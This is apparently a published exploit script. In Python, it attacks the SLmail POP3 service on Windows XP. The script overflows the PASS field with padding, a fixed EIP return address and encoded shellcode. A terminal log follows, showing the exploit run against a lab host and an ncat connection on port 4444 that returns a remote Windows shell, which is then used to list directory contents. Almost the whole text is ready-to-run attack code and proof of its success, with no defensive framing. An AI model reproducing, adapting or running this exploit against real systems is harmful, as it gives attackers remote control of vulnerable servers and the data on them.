https://www.exploit-db.com/exploits/638/
#!/usr/bin/python
# -*- encoding: utf-8 -*-
import sys
import socket
import struct
#
# OS Name: Microsoft Windows XP Professional
# OS Version: 5.1.2600 Service Pack 3 Build 2600
#
BUFSIZE = 1024
def login(host, port, username, password):
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client.connect((host, port))
data = client.recv(BUFSIZE)
# print(data.strip())
# send username
# print("[*] send mail username")
client.send('USER {}\r\n'.format(username))
data = client.recv(BUFSIZE)
# print(data.strip())
# send password
# print("[*] send mail password")
client.send('PASS {}\r\n'.format(password))
# data = client.recv(BUFSIZE)
# print(data)
# client.send('QUIT\r\n')
client.close()
# print("[*] close a connection.")
def chars_generator():
original_char = "A"
chars = [original_char * (i * 200) for i in range(1, 31)]
return chars
if __name__ == "__main__":
if len(sys.argv) != 2:
print("[*] Usage: {} <target ip>".format(sys.argv[0]))
sys.exit(0)
host = sys.argv[1]
port = 110
password = "A" * 2606
password += struct.pack("<L", 0x5f4a358f)
# Bad chars: 00 0a
# EIP: 0x5f4a358f
shellcode = "\x90" * 16
shellcode += "\xbd\x47\xb0\x28\x21\xdb\xd7\xd9\x74\x24\xf4\x58\x31"
shellcode += "\xc9\xb1\x53\x83\xc0\x04\x31\x68\x0e\x03\x2f\xbe\xca"
shellcode += "\xd4\x53\x56\x88\x17\xab\xa7\xed\x9e\x4e\x96\x2d\xc4"
shellcode += "\x1b\x89\x9d\x8e\x49\x26\x55\xc2\x79\xbd\x1b\xcb\x8e"
shellcode += "\x76\x91\x2d\xa1\x87\x8a\x0e\xa0\x0b\xd1\x42\x02\x35"
shellcode += "\x1a\x97\x43\x72\x47\x5a\x11\x2b\x03\xc9\x85\x58\x59"
shellcode += "\xd2\x2e\x12\x4f\x52\xd3\xe3\x6e\x73\x42\x7f\x29\x53"
shellcode += "\x65\xac\x41\xda\x7d\xb1\x6c\x94\xf6\x01\x1a\x27\xde"
shellcode += "\x5b\xe3\x84\x1f\x54\x16\xd4\x58\x53\xc9\xa3\x90\xa7"
shellcode += "\x74\xb4\x67\xd5\xa2\x31\x73\x7d\x20\xe1\x5f\x7f\xe5"
shellcode += "\x74\x14\x73\x42\xf2\x72\x90\x55\xd7\x09\xac\xde\xd6"
shellcode += "\xdd\x24\xa4\xfc\xf9\x6d\x7e\x9c\x58\xc8\xd1\xa1\xba"
shellcode += "\xb3\x8e\x07\xb1\x5e\xda\x35\x98\x36\x2f\x74\x22\xc7"
shellcode += "\x27\x0f\x51\xf5\xe8\xbb\xfd\xb5\x61\x62\xfa\xba\x5b"
shellcode += "\xd2\x94\x44\x64\x23\xbd\x82\x30\x73\xd5\x23\x39\x18"
shellcode += "\x25\xcb\xec\xb5\x2d\x6a\x5f\xa8\xd0\xcc\x0f\x6c\x7a"
shellcode += "\xa5\x45\x63\xa5\xd5\x65\xa9\xce\x7e\x98\x52\xe1\x22"
shellcode += "\x15\xb4\x6b\xcb\x73\x6e\x03\x29\xa0\xa7\xb4\x52\x82"
shellcode += "\x9f\x52\x1a\xc4\x18\x5d\x9b\xc2\x0e\xc9\x10\x01\x8b"
shellcode += "\xe8\x26\x0c\xbb\x7d\xb0\xda\x2a\xcc\x20\xda\x66\xa6"
shellcode += "\xc1\x49\xed\x36\x8f\x71\xba\x61\xd8\x44\xb3\xe7\xf4"
shellcode += "\xff\x6d\x15\x05\x99\x56\x9d\xd2\x5a\x58\x1c\x96\xe7"
shellcode += "\x7e\x0e\x6e\xe7\x3a\x7a\x3e\xbe\x94\xd4\xf8\x68\x57"
shellcode += "\x8e\x52\xc6\x31\x46\x22\x24\x82\x10\x2b\x61\x74\xfc"
shellcode += "\x9a\xdc\xc1\x03\x12\x89\xc5\x7c\x4e\x29\x29\x57\xca"
shellcode += "\x59\x60\xf5\x7b\xf2\x2d\x6c\x3e\x9f\xcd\x5b\x7d\xa6"
shellcode += "\x4d\x69\xfe\x5d\x4d\x18\xfb\x1a\xc9\xf1\x71\x32\xbc"
shellcode += "\xf5\x26\x33\x95"
password += shellcode
login(host, port, "test", password)
print('[*] exploit {}:{} successfully'.format(host, port))
$ python exploit_SLmail.py 192.168.1.103
[*] exploit 192.168.1.103:110 successfully
$ ncat -v 192.168.1.103 4444
Ncat: Version 7.00 ( https://nmap.org/ncat )
Ncat: Connected to 192.168.1.103:4444.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\Program Files\SLmail\System>dir
dir
Volume in drive C has no label.
Volume Serial Number is 941B-AE79
Directory of C:\Program Files\SLmail\System
07/26/2016 04:15 PM <DIR> .
07/26/2016 04:15 PM <DIR> ..
11/19/2002 11:40 AM 3,358 listrcrd.txt
07/26/2016 03:55 PM 1,834 maillog.000
07/26/2016 11:28 PM 340,103 maillog.txt
07/26/2016 04:14 PM 12,288 RegBack.reg
07/26/2016 11:21 PM 34,958 root.mbx
5 File(s) 392,541 bytes
2 Dir(s) 1,668,247,552 bytes free
C:\Program Files\SLmail\System>